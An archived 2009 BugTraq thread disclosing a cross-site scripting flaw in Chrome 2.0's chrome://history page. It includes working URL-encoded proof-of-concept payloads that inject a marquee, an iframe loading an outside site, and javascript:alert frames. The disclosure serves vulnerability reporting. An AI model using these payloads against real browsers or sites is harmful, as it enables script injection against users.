BugTraq
cross site scripting the browser google "chrome" Jul 27 2009 07:33PM
biko linux (bikolinux gmail com) (1 replies)
Fwd: cross site scripting the browser google "chrome" Jul 28 2009 11:31AM
Karn Ganeshen (karnganeshen gmail com)
v2.0.172.37

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CIFRAME%20SRC%3D%22javascript%3A
alert('XSS')%3B%22%3E%3C%2FIFRAME%3E

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CFRAMESET%3E%3CFRAME%20SRC%3D%22
javascript%3Aalert('XSS')%3B%22%3E%3C%2FFRAMESET%3E

Best Regards,
Karn Ganeshen

---------- Forwarded message ----------
From: biko linux <bikolinux (at) gmail (dot) com [email concealed]>
Date: Tue, Jul 28, 2009 at 1:03 AM
Subject: cross site scripting the browser google "chrome"
To: bugtraq (at) securityfocus (dot) com [email concealed]

autor :         bikolinux
Vuln:           cross site scripting the browser google "chrome"
Download:       http://www.google.com/chrome
error           local
EMAIL           MSG (at) BIKOLINUX (dot) NET [email concealed] bikolinux (at) gmail (dot) com [email concealed]
vercion test  2.0.172.37
########################################################################
###############
cross site scripting the browser google "chrome"
The error is when making a request to record
########################################################################
###############
path = chrome://history/
path = view-source:chrome://history/

The error is in the form

EXAMPLE
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2
Fmarquee%3E
view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines
.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E

--
bikolinux allowed

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus